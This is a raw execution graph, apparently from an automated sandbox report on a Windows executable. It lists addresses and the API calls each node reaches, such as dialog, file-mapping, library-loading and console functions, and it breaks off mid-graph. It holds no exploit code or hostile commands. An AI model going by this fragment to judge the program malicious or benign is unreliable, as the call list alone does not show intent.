                                                                                                                                            execution_graph 23010 7ff6ef6d5ab4 14 API calls std::_Xinvalid_argument 23048 7ff6ef6ea3b0 CloseHandle 20703 7ff6ef6d52b0 20704 7ff6ef6d52bc _snwprintf 20703->20704 20711 7ff6ef6c2948 20704->20711 20712 7ff6ef6c295b 20711->20712 20731 7ff6ef6c1994 20712->20731 20715 7ff6ef6c29c0 LoadStringW 20716 7ff6ef6c29ee 20715->20716 20717 7ff6ef6c29d9 LoadStringW 20715->20717 20718 7ff6ef6b552c 20716->20718 20717->20716 20719 7ff6ef6b5551 swprintf 20718->20719 20757 7ff6ef6de268 20719->20757 20722 7ff6ef6d6760 20724 7ff6ef6d6769 20722->20724 20723 7ff6ef6d532b 20724->20723 20725 7ff6ef6d68d0 IsProcessorFeaturePresent 20724->20725 20726 7ff6ef6d68e8 20725->20726 20846 7ff6ef6d6ac4 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 20726->20846 20728 7ff6ef6d68fb 20847 7ff6ef6d6894 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20728->20847 20738 7ff6ef6c1884 20731->20738 20733 7ff6ef6c19f9 20736 7ff6ef6d6760 _handle_error 8 API calls 20733->20736 20737 7ff6ef6c1a12 20736->20737 20737->20715 20737->20716 20739 7ff6ef6c18ba 20738->20739 20747 7ff6ef6c1950 20738->20747 20740 7ff6ef6c18e7 20739->20740 20752 7ff6ef6c6948 WideCharToMultiByte 20739->20752 20744 7ff6ef6c1916 20740->20744 20754 7ff6ef6c28f0 46 API calls 2 library calls 20740->20754 20742 7ff6ef6d6760 _handle_error 8 API calls 20743 7ff6ef6c1984 20742->20743 20743->20733 20748 7ff6ef6c1a20 20743->20748 20755 7ff6ef6de6f4 31 API calls 2 library calls 20744->20755 20747->20742 20749 7ff6ef6c1a42 20748->20749 20751 7ff6ef6c1a6a 20748->20751 20756 7ff6ef6de6f4 31 API calls 2 library calls 20749->20756 20751->20733 20753 7ff6ef6c698a 20752->20753 20753->20740 20754->20744 20755->20747 20756->20751 20758 7ff6ef6de2ae 20757->20758 20759 7ff6ef6de2c6 20757->20759 20784 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 20758->20784 20759->20758 20761 7ff6ef6de2d0 20759->20761 20786 7ff6ef6dc268 20761->20786 20762 7ff6ef6de2b3 20785 7ff6ef6dbda0 31 API calls _invalid_parameter_noinfo 20762->20785 20765 7ff6ef6d6760 _handle_error 8 API calls 20767 7ff6ef6b556d SetDlgItemTextW SetWindowTextW 20765->20767 20766 7ff6ef6de2e1 memcpy_s 20794 7ff6ef6dc1e8 15 API calls _set_errno_from_matherr 20766->20794 20767->20722 20769 7ff6ef6de34c 20795 7ff6ef6dc670 47 API calls 3 library calls 20769->20795 20771 7ff6ef6de355 20772 7ff6ef6de35d 20771->20772 20773 7ff6ef6de38c 20771->20773 20796 7ff6ef6e1a84 20772->20796 20775 7ff6ef6de3e4 20773->20775 20776 7ff6ef6de39b 20773->20776 20777 7ff6ef6de40a 20773->20777 20781 7ff6ef6de392 20773->20781 20778 7ff6ef6e1a84 __free_lconv_num 15 API calls 20775->20778 20780 7ff6ef6e1a84 __free_lconv_num 15 API calls 20776->20780 20777->20775 20779 7ff6ef6de414 20777->20779 20783 7ff6ef6de2be 20778->20783 20782 7ff6ef6e1a84 __free_lconv_num 15 API calls 20779->20782 20780->20783 20781->20775 20781->20776 20782->20783 20783->20765 20784->20762 20785->20783 20787 7ff6ef6dc283 20786->20787 20788 7ff6ef6dc27e 20786->20788 20787->20788 20802 7ff6ef6e18e0 GetLastError 20787->20802 20788->20766 20790 7ff6ef6dc2a0 20822 7ff6ef6e203c 35 API calls _snwprintf 20790->20822 20792 7ff6ef6dc2c4 20823 7ff6ef6e2070 35 API calls _snwprintf 20792->20823 20794->20769 20795->20771 20797 7ff6ef6e1a89 RtlFreeHeap 20796->20797 20801 7ff6ef6e1ab9 __free_lconv_num 20796->20801 20798 7ff6ef6e1aa4 20797->20798 20797->20801 20845 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 20798->20845 20800 7ff6ef6e1aa9 GetLastError 20800->20801 20801->20783 20803 7ff6ef6e1902 20802->20803 20804 7ff6ef6e18fd 20802->20804 20809 7ff6ef6e194b 20803->20809 20825 7ff6ef6e3eb4 20803->20825 20824 7ff6ef6e3b14 6 API calls __vcrt_uninitialize_ptd 20804->20824 20808 7ff6ef6e1921 20814 7ff6ef6e1a84 __free_lconv_num 15 API calls 20808->20814 20811 7ff6ef6e1950 SetLastError 20809->20811 20812 7ff6ef6e1966 SetLastError 20809->20812 20811->20790 20834 7ff6ef6e14a8 35 API calls abort 20812->20834 20817 7ff6ef6e1928 20814->20817 20815 7ff6ef6e1938 20815->20808 20818 7ff6ef6e193f 20815->20818 20817->20812 20833 7ff6ef6e1690 15 API calls abort 20818->20833 20820 7ff6ef6e1944 20821 7ff6ef6e1a84 __free_lconv_num 15 API calls 20820->20821 20821->20809 20822->20792 20823->20788 20824->20803 20830 7ff6ef6e3ec5 abort 20825->20830 20826 7ff6ef6e3f16 20838 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 20826->20838 20827 7ff6ef6e3efa HeapAlloc 20828 7ff6ef6e1919 20827->20828 20827->20830 20828->20808 20832 7ff6ef6e3b6c 6 API calls __vcrt_uninitialize_ptd 20828->20832 20830->20826 20830->20827 20835 7ff6ef6e008c 20830->20835 20832->20815 20833->20820 20839 7ff6ef6e00cc 20835->20839 20838->20828 20844 7ff6ef6e3848 EnterCriticalSection 20839->20844 20841 7ff6ef6e00d9 20842 7ff6ef6e38a8 abort LeaveCriticalSection 20841->20842 20843 7ff6ef6e009e 20842->20843 20843->20830 20845->20800 20846->20728 23049 7ff6ef6d79b0 LocalFree 23050 7ff6ef6d7fa8 35 API calls __GSHandlerCheck_EH 22398 7ff6ef6d5aa1 22399 7ff6ef6d59d4 22398->22399 22399->22398 22400 7ff6ef6d61d0 std::_Xinvalid_argument 14 API calls 22399->22400 22400->22399 23051 7ff6ef6de5a0 QueryPerformanceFrequency QueryPerformanceCounter 23014 7ff6ef6e029c 59 API calls abort 23052 7ff6ef6e8190 48 API calls 23053 7ff6ef6eab8d GetDlgItem EnableWindow ShowWindow SendMessageW 23015 7ff6ef6dac8d 45 API calls 2 library calls 23016 7ff6ef6b1080 50 API calls 23054 7ff6ef6d7580 44 API calls __GSHandlerCheck_EH 23055 7ff6ef6d7180 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter __security_init_cookie 23002 7ff6ef6d507c 23005 7ff6ef6c48f8 23002->23005 23006 7ff6ef6c4900 SendDlgItemMessageW 23005->23006 23017 7ff6ef6b1070 10 API calls _handle_error 23019 7ff6ef6cf670 9 API calls _handle_error 23020 7ff6ef6d0470 13 API calls 23022 7ff6ef6e2e70 66 API calls __free_lconv_num 23023 7ff6ef6e3e70 FreeLibrary 22336 7ff6ef6d5d63 22337 7ff6ef6d5c9b 22336->22337 22337->22336 22339 7ff6ef6d61d0 22337->22339 22365 7ff6ef6d5e2c 22339->22365 22342 7ff6ef6d625b 22343 7ff6ef6d613c DloadReleaseSectionWriteAccess 6 API calls 22342->22343 22344 7ff6ef6d6268 RaiseException 22343->22344 22345 7ff6ef6d6485 22344->22345 22345->22337 22346 7ff6ef6d630d LoadLibraryExA 22349 7ff6ef6d6324 GetLastError 22346->22349 22350 7ff6ef6d6379 22346->22350 22347 7ff6ef6d6284 22347->22346 22348 7ff6ef6d6455 22347->22348 22347->22350 22352 7ff6ef6d638d 22347->22352 22373 7ff6ef6d613c 22348->22373 22354 7ff6ef6d634e 22349->22354 22355 7ff6ef6d6339 22349->22355 22351 7ff6ef6d6384 FreeLibrary 22350->22351 22350->22352 22351->22352 22352->22348 22353 7ff6ef6d63eb GetProcAddress 22352->22353 22353->22348 22358 7ff6ef6d6400 GetLastError 22353->22358 22357 7ff6ef6d613c DloadReleaseSectionWriteAccess 6 API calls 22354->22357 22355->22350 22355->22354 22359 7ff6ef6d635b RaiseException 22357->22359 22360 7ff6ef6d6415 22358->22360 22359->22345 22360->22348 22361 7ff6ef6d613c DloadReleaseSectionWriteAccess 6 API calls 22360->22361 22362 7ff6ef6d6437 RaiseException 22361->22362 22363 7ff6ef6d5e2c std::_Xinvalid_argument 6 API calls 22362->22363 22364 7ff6ef6d6451 22363->22364 22364->22348 22366 7ff6ef6d5e42 22365->22366 22372 7ff6ef6d5ea7 22365->22372 22381 7ff6ef6d5ed8 22366->22381 22369 7ff6ef6d5ea2 22371 7ff6ef6d5ed8 DloadReleaseSectionWriteAccess 3 API calls 22369->22371 22371->22372 22372->22342 22372->22347 22374 7ff6ef6d61a5 22373->22374 22375 7ff6ef6d614c 22373->22375 22374->22345 22376 7ff6ef6d5ed8 DloadReleaseSectionWriteAccess 3 API calls 22375->22376 22377 7ff6ef6d6151 22376->22377 22378 7ff6ef6d61a0 22377->22378 22379 7ff6ef6d60ac DloadProtectSection 3 API calls 22377->22379 22380 7ff6ef6d5ed8 DloadReleaseSectionWriteAccess 3 API calls 22378->22380 22379->22378 22380->22374 22382 7ff6ef6d5ef3 22381->22382 22383 7ff6ef6d5e47 22381->22383 22382->22383 22384 7ff6ef6d5ef8 GetModuleHandleW 22382->22384 22383->22369 22388 7ff6ef6d60ac 22383->22388 22385 7ff6ef6d5f12 GetProcAddress 22384->22385 22386 7ff6ef6d5f0d 22384->22386 22385->22386 22387 7ff6ef6d5f27 GetProcAddress 22385->22387 22386->22383 22387->22386 22389 7ff6ef6d60ce DloadProtectSection 22388->22389 22390 7ff6ef6d60d6 22389->22390 22391 7ff6ef6d610e VirtualProtect 22389->22391 22393 7ff6ef6d5f78 VirtualQuery GetSystemInfo 22389->22393 22390->22369 22391->22390 22393->22391 23057 7ff6ef6eb160 VariantClear 23024 7ff6ef6d7a60 RtlPcToFileHeader RaiseException _com_raise_error _com_error::_com_error 23058 7ff6ef6d4f60 DialogBoxParamW 23026 7ff6ef6d784f MultiByteToWideChar SysAllocString GetLastError GetLastError 23027 7ff6ef6d1450 67 API calls 23061 7ff6ef6cf750 6 API calls 23062 7ff6ef6e2d50 16 API calls 2 library calls 23064 7ff6ef6eab48 74 API calls 23065 7ff6ef6ea744 33 API calls _com_raise_error 23066 7ff6ef6c5b40 81 API calls 23067 7ff6ef6e3f44 36 API calls 4 library calls 23071 7ff6ef6d6b38 48 API calls 2 library calls 23030 7ff6ef6d7134 GetModuleHandleW abort 23031 7ff6ef6e3130 16 API calls 22303 7ff6ef6e512c 22304 7ff6ef6e5134 22303->22304 22305 7ff6ef6e5173 22304->22305 22306 7ff6ef6e5164 22304->22306 22309 7ff6ef6e517d 22305->22309 22325 7ff6ef6e81a8 32 API calls 2 library calls 22305->22325 22324 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 22306->22324 22312 7ff6ef6e1ac4 22309->22312 22311 7ff6ef6e5169 memcpy_s 22313 7ff6ef6e1ae3 22312->22313 22314 7ff6ef6e1ad9 22312->22314 22316 7ff6ef6e1ae8 22313->22316 22318 7ff6ef6e1aef abort 22313->22318 22326 7ff6ef6e1c94 22314->22326 22317 7ff6ef6e1a84 __free_lconv_num 15 API calls 22316->22317 22322 7ff6ef6e1ae1 22317->22322 22319 7ff6ef6e1b2e 22318->22319 22321 7ff6ef6e1b18 RtlReAllocateHeap 22318->22321 22323 7ff6ef6e008c abort 2 API calls 22318->22323 22333 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 22319->22333 22321->22318 22321->22322 22322->22311 22323->22318 22324->22311 22325->22309 22327 7ff6ef6e1cdf 22326->22327 22331 7ff6ef6e1ca3 abort 22326->22331 22334 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 22327->22334 22328 7ff6ef6e1cc6 HeapAlloc 22330 7ff6ef6e1cdd 22328->22330 22328->22331 22330->22322 22331->22327 22331->22328 22332 7ff6ef6e008c abort 2 API calls 22331->22332 22332->22331 22333->22322 22334->22330 23073 7ff6ef6b1020 34 API calls 23033 7ff6ef6d6f20 59 API calls 2 library calls 22403 7ff6ef6d5e1d 22404 7ff6ef6d5d74 22403->22404 22405 7ff6ef6d61d0 std::_Xinvalid_argument 14 API calls 22404->22405 22406 7ff6ef6d5db3 22405->22406 22407 7ff6ef6d961c 22414 7ff6ef6db70c 22407->22414 22413 7ff6ef6d9629 22416 7ff6ef6db714 22414->22416 22417 7ff6ef6db745 22416->22417 22418 7ff6ef6d9625 22416->22418 22428 7ff6ef6dba08 22416->22428 22433 7ff6ef6db754 DeleteCriticalSection 22417->22433 22418->22413 22420 7ff6ef6d978c 22418->22420 22444 7ff6ef6db8dc 22420->22444 22434 7ff6ef6db78c 22428->22434 22431 7ff6ef6dba53 InitializeCriticalSectionAndSpinCount 22432 7ff6ef6dba48 22431->22432 22432->22416 22433->22418 22435 7ff6ef6db7d0 __vcrt_InitializeCriticalSectionEx 22434->22435 22436 7ff6ef6db8b3 22434->22436 22435->22436 22437 7ff6ef6db7fe LoadLibraryExW 22435->22437 22438 7ff6ef6db895 GetProcAddress 22435->22438 22443 7ff6ef6db841 LoadLibraryExW 22435->22443 22436->22431 22436->22432 22439 7ff6ef6db875 22437->22439 22440 7ff6ef6db81f GetLastError 22437->22440 22438->22436 22442 7ff6ef6db8a6 22438->22442 22439->22438 22441 7ff6ef6db88c FreeLibrary 22439->22441 22440->22435 22441->22438 22442->22436 22443->22435 22443->22439 22445 7ff6ef6db78c __vcrt_InitializeCriticalSectionEx 5 API calls 22444->22445 22446 7ff6ef6db901 TlsAlloc 22445->22446 23034 7ff6ef6d4710 64 API calls 23075 7ff6ef6cd610 137 API calls 22478 7ff6ef6d700c 22503 7ff6ef6d6d00 22478->22503 22481 7ff6ef6d7158 22577 7ff6ef6d7388 7 API calls 2 library calls 22481->22577 22482 7ff6ef6d7028 __scrt_acquire_startup_lock 22484 7ff6ef6d7162 22482->22484 22486 7ff6ef6d7046 22482->22486 22578 7ff6ef6d7388 7 API calls 2 library calls 22484->22578 22487 7ff6ef6d706b 22486->22487 22494 7ff6ef6d7088 __scrt_release_startup_lock 22486->22494 22511 7ff6ef6e1230 22486->22511 22488 7ff6ef6d716d abort 22490 7ff6ef6d70f1 22515 7ff6ef6d74d4 22490->22515 22492 7ff6ef6d70f6 22518 7ff6ef6e11c0 22492->22518 22494->22490 22574 7ff6ef6e04f4 35 API calls __GSHandlerCheck_EH 22494->22574 22579 7ff6ef6d71c8 22503->22579 22506 7ff6ef6d6d2f 22581 7ff6ef6e10f0 22506->22581 22507 7ff6ef6d6d2b 22507->22481 22507->22482 22512 7ff6ef6e128b 22511->22512 22513 7ff6ef6e126c 22511->22513 22512->22494 22513->22512 22756 7ff6ef6b10c0 22513->22756 22762 7ff6ef6d7ac0 22515->22762 22519 7ff6ef6e4be0 48 API calls 22518->22519 22520 7ff6ef6e11cf 22519->22520 22521 7ff6ef6d70fe 22520->22521 22764 7ff6ef6e4f70 35 API calls _snwprintf 22520->22764 22523 7ff6ef6d5334 22521->22523 22765 7ff6ef6c5008 22523->22765 22527 7ff6ef6d537b 22822 7ff6ef6d13a0 22527->22822 22529 7ff6ef6d5385 memcpy_s 22530 7ff6ef6d539b GetCommandLineW 22529->22530 22531 7ff6ef6d5471 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22530->22531 22532 7ff6ef6d53ad 22530->22532 22534 7ff6ef6b552c swprintf 47 API calls 22531->22534 22827 7ff6ef6d338c 22532->22827 22536 7ff6ef6d54f3 SetEnvironmentVariableW GetModuleHandleW LoadIconW 22534->22536 22841 7ff6ef6d2288 LoadBitmapW 22536->22841 22537 7ff6ef6d53c2 OpenFileMappingW 22541 7ff6ef6d545e CloseHandle 22537->22541 22542 7ff6ef6d53e0 MapViewOfFile 22537->22542 22538 7ff6ef6d5469 22833 7ff6ef6d4e64 22538->22833 22541->22531 22544 7ff6ef6d5455 UnmapViewOfFile 22542->22544 22545 7ff6ef6d53fe BuildCatchObjectHelperInternal 22542->22545 22544->22541 22549 7ff6ef6d4e64 10 API calls 22545->22549 22547 7ff6ef6d554d 22865 7ff6ef6cf278 22547->22865 22551 7ff6ef6d541f 22549->22551 22886 7ff6ef6c37e8 79 API calls 22551->22886 22552 7ff6ef6cf278 4 API calls 22554 7ff6ef6d5560 DialogBoxParamW 22552->22554 22558 7ff6ef6d55b1 22554->22558 22555 7ff6ef6d5439 22887 7ff6ef6c3934 79 API calls 22555->22887 22557 7ff6ef6d5448 22557->22544 22559 7ff6ef6d55c4 Sleep 22558->22559 22560 7ff6ef6d55ca 22558->22560 22559->22560 22562 7ff6ef6d55d8 22560->22562 22868 7ff6ef6d1770 22560->22868 22563 7ff6ef6d55fa DeleteObject 22562->22563 22564 7ff6ef6d5613 DeleteObject 22563->22564 22565 7ff6ef6d5619 22563->22565 22564->22565 22566 7ff6ef6d564f 22565->22566 22567 7ff6ef6d5661 22565->22567 22568 7ff6ef6d4ef4 5 API calls 22566->22568 22882 7ff6ef6d1418 22567->22882 22569 7ff6ef6d5654 CloseHandle 22568->22569 22569->22567 22574->22490 22577->22484 22578->22488 22580 7ff6ef6d6d22 __scrt_dllmain_crt_thread_attach 22579->22580 22580->22506 22580->22507 22583 7ff6ef6e51fc 22581->22583 22582 7ff6ef6d6d34 22582->22507 22588 7ff6ef6d9644 7 API calls 2 library calls 22582->22588 22583->22582 22589 7ff6ef6e3800 22583->22589 22595 7ff6ef6e30f0 22583->22595 22606 7ff6ef6e4be0 22583->22606 22610 7ff6ef6e1a20 22583->22610 22588->22507 22590 7ff6ef6e3808 22589->22590 22592 7ff6ef6e3839 22590->22592 22593 7ff6ef6e3835 22590->22593 22617 7ff6ef6e3bd4 22590->22617 22622 7ff6ef6e3870 DeleteCriticalSection 22592->22622 22593->22583 22633 7ff6ef6e3848 EnterCriticalSection 22595->22633 22597 7ff6ef6e3100 22598 7ff6ef6e56fc 32 API calls 22597->22598 22599 7ff6ef6e3109 22598->22599 22600 7ff6ef6e2efc 34 API calls 22599->22600 22605 7ff6ef6e3117 22599->22605 22602 7ff6ef6e3112 22600->22602 22601 7ff6ef6e38a8 abort LeaveCriticalSection 22603 7ff6ef6e3123 22601->22603 22604 7ff6ef6e2fe8 GetStdHandle GetFileType 22602->22604 22603->22583 22604->22605 22605->22601 22607 7ff6ef6e4bf9 22606->22607 22608 7ff6ef6e4bed 22606->22608 22607->22583 22634 7ff6ef6e4a20 22608->22634 22749 7ff6ef6e3a64 22610->22749 22613 7ff6ef6e1a3b 22613->22583 22615 7ff6ef6e1a44 22615->22613 22755 7ff6ef6e1a60 6 API calls __vcrt_uninitialize_ptd 22615->22755 22623 7ff6ef6e38c4 22617->22623 22620 7ff6ef6e3c2c InitializeCriticalSectionAndSpinCount 22621 7ff6ef6e3c17 22620->22621 22621->22590 22622->22593 22624 7ff6ef6e3925 22623->22624 22628 7ff6ef6e3920 22623->22628 22624->22620 22624->22621 22625 7ff6ef6e39d2 22625->22624 22627 7ff6ef6e39e0 GetProcAddress 22625->22627 22626 7ff6ef6e394d LoadLibraryExW 22626->22628 22629 7ff6ef6e396e GetLastError 22626->22629 22630 7ff6ef6e39f1 22627->22630 22628->22624 22628->22625 22628->22626 22632 7ff6ef6e39b7 FreeLibrary 22628->22632 22629->22628 22631 7ff6ef6e3979 LoadLibraryExW 22629->22631 22630->22624 22631->22628 22632->22628 22635 7ff6ef6e18e0 abort 35 API calls 22634->22635 22636 7ff6ef6e4a39 22635->22636 22654 7ff6ef6e4c08 22636->22654 22641 7ff6ef6e4a5c 22641->22607 22642 7ff6ef6e1c94 swprintf 16 API calls 22644 7ff6ef6e4a6d 22642->22644 22643 7ff6ef6e1a84 __free_lconv_num 15 API calls 22643->22641 22653 7ff6ef6e4b08 22644->22653 22672 7ff6ef6e4cc8 22644->22672 22647 7ff6ef6e4b03 22682 7ff6ef6e1c74 15 API calls _set_errno_from_matherr 22647->22682 22649 7ff6ef6e4b65 22649->22653 22683 7ff6ef6e44dc 31 API calls abort 22649->22683 22650 7ff6ef6e4b28 22650->22649 22651 7ff6ef6e1a84 __free_lconv_num 15 API calls 22650->22651 22651->22649 22653->22643 22655 7ff6ef6e18e0 abort 35 API calls 22654->22655 22656 7ff6ef6e4c17 22655->22656 22657 7ff6ef6e4c32 22656->22657 22684 7ff6ef6e3848 EnterCriticalSection 22656->22684 22660 7ff6ef6e4a42 22657->22660 22685 7ff6ef6e14a8 35 API calls abort 22657->22685 22665 7ff6ef6e472c 22660->22665 22666 7ff6ef6dc268 _snwprintf 35 API calls 22665->22666 22667 7ff6ef6e4740 22666->22667 22668 7ff6ef6e475e 22667->22668 22669 7ff6ef6e474c GetOEMCP 22667->22669 22670 7ff6ef6e4773 22668->22670 22671 7ff6ef6e4763 GetACP 22668->22671 22669->22670 22670->22641 22670->22642 22671->22670 22673 7ff6ef6e472c 37 API calls 22672->22673 22674 7ff6ef6e4cf5 22673->22674 22675 7ff6ef6e4cfd 22674->22675 22676 7ff6ef6e4d3f IsValidCodePage 22674->22676 22681 7ff6ef6e4d65 memcpy_s 22674->22681 22678 7ff6ef6d6760 _handle_error 8 API calls 22675->22678 22676->22675 22677 7ff6ef6e4d50 GetCPInfo 22676->22677 22677->22675 22677->22681 22679 7ff6ef6e4afc 22678->22679 22679->22647 22679->22650 22686 7ff6ef6e483c GetCPInfo 22681->22686 22682->22653 22683->22653 22687 7ff6ef6e4965 22686->22687 22693 7ff6ef6e4885 22686->22693 22689 7ff6ef6d6760 _handle_error 8 API calls 22687->22689 22692 7ff6ef6e4a09 22689->22692 22692->22675 22696 7ff6ef6e5c08 22693->22696 22695 7ff6ef6e3768 swprintf 40 API calls 22695->22687 22697 7ff6ef6dc268 _snwprintf 35 API calls 22696->22697 22698 7ff6ef6e5c4a MultiByteToWideChar 22697->22698 22700 7ff6ef6e5c8f 22698->22700 22701 7ff6ef6e5c88 22698->22701 22702 7ff6ef6e1c94 swprintf 16 API calls 22700->22702 22706 7ff6ef6e5cbd memcpy_s _snwprintf 22700->22706 22703 7ff6ef6d6760 _handle_error 8 API calls 22701->22703 22702->22706 22704 7ff6ef6e48f9 22703->22704 22710 7ff6ef6e3768 22704->22710 22705 7ff6ef6e5d2d MultiByteToWideChar 22707 7ff6ef6e5d4e GetStringTypeW 22705->22707 22708 7ff6ef6e5d68 22705->22708 22706->22705 22706->22708 22707->22708 22708->22701 22709 7ff6ef6e1a84 __free_lconv_num 15 API calls 22708->22709 22709->22701 22711 7ff6ef6dc268 _snwprintf 35 API calls 22710->22711 22712 7ff6ef6e378d 22711->22712 22715 7ff6ef6e340c 22712->22715 22716 7ff6ef6e344e swprintf 22715->22716 22717 7ff6ef6e3472 MultiByteToWideChar 22716->22717 22718 7ff6ef6e34a4 22717->22718 22725 7ff6ef6e371d 22717->22725 22722 7ff6ef6e1c94 swprintf 16 API calls 22718->22722 22726 7ff6ef6e34dc _snwprintf 22718->22726 22719 7ff6ef6d6760 _handle_error 8 API calls 22720 7ff6ef6e372b 22719->22720 22720->22695 22721 7ff6ef6e3540 MultiByteToWideChar 22723 7ff6ef6e3566 22721->22723 22728 7ff6ef6e35f1 22721->22728 22722->22726 22742 7ff6ef6e3c4c 22723->22742 22725->22719 22726->22721 22726->22728 22728->22725 22729 7ff6ef6e1a84 __free_lconv_num 15 API calls 22728->22729 22729->22725 22730 7ff6ef6e35ae 22730->22728 22733 7ff6ef6e3c4c swprintf 6 API calls 22730->22733 22731 7ff6ef6e3600 22732 7ff6ef6e1c94 swprintf 16 API calls 22731->22732 22735 7ff6ef6e362b _snwprintf 22731->22735 22732->22735 22733->22728 22734 7ff6ef6e3c4c swprintf 6 API calls 22736 7ff6ef6e36be 22734->22736 22735->22728 22735->22734 22737 7ff6ef6e36f4 22736->22737 22738 7ff6ef6e36e8 WideCharToMultiByte 22736->22738 22737->22728 22739 7ff6ef6e1a84 __free_lconv_num 15 API calls 22737->22739 22738->22737 22740 7ff6ef6e3754 22738->22740 22739->22728 22740->22728 22741 7ff6ef6e1a84 __free_lconv_num 15 API calls 22740->22741 22741->22728 22743 7ff6ef6e38c4 __vcrt_uninitialize_ptd 5 API calls 22742->22743 22744 7ff6ef6e3c8f 22743->22744 22746 7ff6ef6e3598 22744->22746 22748 7ff6ef6e3d3c 5 API calls 2 library calls 22744->22748 22746->22728 22746->22730 22746->22731 22747 7ff6ef6e3cf8 LCMapStringW 22747->22746 22748->22747 22750 7ff6ef6e38c4 __vcrt_uninitialize_ptd 5 API calls 22749->22750 22751 7ff6ef6e3a90 22750->22751 22752 7ff6ef6e3aa8 TlsAlloc 22751->22752 22753 7ff6ef6e1a30 22751->22753 22752->22753 22753->22613 22754 7ff6ef6e1974 15 API calls 2 library calls 22753->22754 22754->22615 22755->22613 22757 7ff6ef6b6f58 49 API calls 22756->22757 22758 7ff6ef6b10d0 22757->22758 22761 7ff6ef6d6ec0 34 API calls 22758->22761 22760 7ff6ef6d6f05 22760->22513 22761->22760 22763 7ff6ef6d74eb GetStartupInfoW 22762->22763 22763->22492 22764->22520 22766 7ff6ef6d6bd0 _snwprintf 22765->22766 22767 7ff6ef6c502c GetModuleHandleW 22766->22767 22768 7ff6ef6c505e GetProcAddress 22767->22768 22769 7ff6ef6c50b3 22767->22769 22771 7ff6ef6c5073 22768->22771 22772 7ff6ef6c508b GetProcAddress 22768->22772 22770 7ff6ef6c54a6 GetModuleFileNameW 22769->22770 22897 7ff6ef6dfc08 39 API calls 2 library calls 22769->22897 22791 7ff6ef6c54c4 22770->22791 22771->22772 22772->22769 22773 7ff6ef6c50a0 22772->22773 22773->22769 22775 7ff6ef6c53b7 22775->22770 22776 7ff6ef6c53c1 GetModuleFileNameW CreateFileW 22775->22776 22777 7ff6ef6c549d CloseHandle 22776->22777 22778 7ff6ef6c540b SetFilePointer 22776->22778 22777->22770 22778->22777 22779 7ff6ef6c5420 ReadFile 22778->22779 22779->22777 22780 7ff6ef6c5444 22779->22780 22782 7ff6ef6c5706 22780->22782 22786 7ff6ef6c5458 22780->22786 22781 7ff6ef6beb40 9 API calls 22781->22791 22900 7ff6ef6d69a4 8 API calls 22782->22900 22785 7ff6ef6c570b 22789 7ff6ef6c5496 22786->22789 22792 7ff6ef6c4f90 10 API calls 22786->22792 22787 7ff6ef6c5538 GetFileAttributesW 22790 7ff6ef6c555c 22787->22790 22787->22791 22788 7ff6ef6c54fa CompareStringW 22788->22791 22789->22777 22793 7ff6ef6c55a7 22790->22793 22794 7ff6ef6c5566 22790->22794 22791->22781 22791->22787 22791->22788 22791->22790 22888 7ff6ef6c4f90 22791->22888 22792->22786 22795 7ff6ef6c55b0 22793->22795 22796 7ff6ef6c56db 22793->22796 22799 7ff6ef6c5585 GetFileAttributesW 22794->22799 22801 7ff6ef6c55a2 22794->22801 22800 7ff6ef6beb40 9 API calls 22795->22800 22797 7ff6ef6d6760 _handle_error 8 API calls 22796->22797 22798 7ff6ef6c56ea 22797->22798 22821 7ff6ef6d0b5c GetCurrentDirectoryW 22798->22821 22799->22794 22799->22801 22802 7ff6ef6c55c1 22800->22802 22801->22793 22803 7ff6ef6c563f 22802->22803 22804 7ff6ef6c55c8 22802->22804 22805 7ff6ef6b552c swprintf 47 API calls 22803->22805 22806 7ff6ef6c4f90 10 API calls 22804->22806 22807 7ff6ef6c5672 AllocConsole 22805->22807 22808 7ff6ef6c55d4 22806->22808 22809 7ff6ef6c56d2 ExitProcess 22807->22809 22810 7ff6ef6c567c GetCurrentProcessId AttachConsole 22807->22810 22811 7ff6ef6c4f90 10 API calls 22808->22811 22898 7ff6ef6dbb78 22810->22898 22813 7ff6ef6c55e0 22811->22813 22815 7ff6ef6c2948 49 API calls 22813->22815 22814 7ff6ef6c5696 GetStdHandle WriteConsoleW Sleep FreeConsole 22814->22809 22816 7ff6ef6c55ea 22815->22816 22817 7ff6ef6b552c swprintf 47 API calls 22816->22817 22818 7ff6ef6c5619 22817->22818 22819 7ff6ef6c2948 49 API calls 22818->22819 22820 7ff6ef6c5623 22819->22820 22820->22809 22821->22527 22823 7ff6ef6c4f90 10 API calls 22822->22823 22824 7ff6ef6d13b5 OleInitialize 22823->22824 22825 7ff6ef6d13db 22824->22825 22826 7ff6ef6d1401 SHGetMalloc 22825->22826 22826->22529 22831 7ff6ef6d33a1 _snwprintf 22827->22831 22828 7ff6ef6d34b9 22829 7ff6ef6d6760 _handle_error 8 API calls 22828->22829 22830 7ff6ef6d34c9 22829->22830 22830->22537 22830->22538 22831->22828 22901 7ff6ef6c3934 79 API calls 22831->22901 22834 7ff6ef6d6bd0 _snwprintf 22833->22834 22835 7ff6ef6d4e70 SetEnvironmentVariableW 22834->22835 22836 7ff6ef6d4eab 22835->22836 22837 7ff6ef6d4ed8 22836->22837 22840 7ff6ef6d4ec8 SetEnvironmentVariableW 22836->22840 22838 7ff6ef6d6760 _handle_error 8 API calls 22837->22838 22839 7ff6ef6d4ee8 22838->22839 22839->22531 22840->22837 22842 7ff6ef6d22b2 22841->22842 22843 7ff6ef6d22ba 22841->22843 22902 7ff6ef6d0c0c FindResourceW 22842->22902 22845 7ff6ef6d22c2 GetObjectW 22843->22845 22846 7ff6ef6d22d7 22843->22846 22845->22846 22847 7ff6ef6d0abc 4 API calls 22846->22847 22850 7ff6ef6d22ec 22847->22850 22848 7ff6ef6d2342 22860 7ff6ef6c1aac 22848->22860 22849 7ff6ef6d2312 22917 7ff6ef6d0b24 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 22849->22917 22850->22848 22850->22849 22851 7ff6ef6d0c0c 11 API calls 22850->22851 22853 7ff6ef6d22fe 22851->22853 22853->22849 22855 7ff6ef6d2306 DeleteObject 22853->22855 22854 7ff6ef6d231b 22856 7ff6ef6d0aec 4 API calls 